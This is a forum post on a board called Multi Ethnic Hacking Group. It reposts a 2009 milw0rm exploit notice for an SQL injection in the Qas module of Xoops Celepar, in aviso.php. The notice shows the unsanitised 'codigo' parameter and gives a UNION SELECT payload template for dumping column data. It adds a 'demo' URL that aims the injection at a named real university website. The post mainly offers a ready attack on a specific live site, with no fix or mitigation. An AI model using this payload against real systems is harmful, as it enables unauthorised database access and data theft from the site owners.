Multi Ethnic Hacking Group


    Xoops Celepar Module Qas (codigo) SQL Injection Vulnerability

    Share

    Foxi
    Admin

    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    Xoops Celepar Module Qas (codigo) SQL Injection Vulnerability

    Post by Foxi on Sat Jul 25, 2009 11:44 am

    Code:
    **********************************************************************************************************
    Xoops Celepar Module Qas
    Donwload of Xoops Celepar : http://www.xoops.pr.gov.br/uploads/core/xoopscelepar.tar.gz
    Author: s4r4d0
    mail:s4r4d0@yahoo.com
    **********************************************************************************************************
    A Sql Injection has been found on modules Quas of Xoops Celepar in file Aviso.php .
    Source code:
        }
        $codigo = $_POST['codigo'];
    } else
        $codigo = $_GET['codigo'];
    ***********************************************************************************************************
    Target: site.com.br/modules/qas/aviso.php?codigo=
    Sql Code :-1+UNION+SELECT+1,2,columnname,4,5,6,7,8+from+tablename
    Demo: http://www.dce.uem.br/modules/qas/aviso.php?codigo=-1+UNION+SELECT+1,2,3,4,5,6,7,8--
    ***********************************************************************************************************
    [ Fatal Error Group Br ]
    [Greetz: to Elemento_pcx - m4v3rick - w4nt3d - DD3str0yer  - M0nt3r - Vympel]
    [From Brazil]
    ************************************************************************************************************

    # milw0rm.com [2009-07-24]


      Current date/time is Sun Jan 22, 2017 5:35 am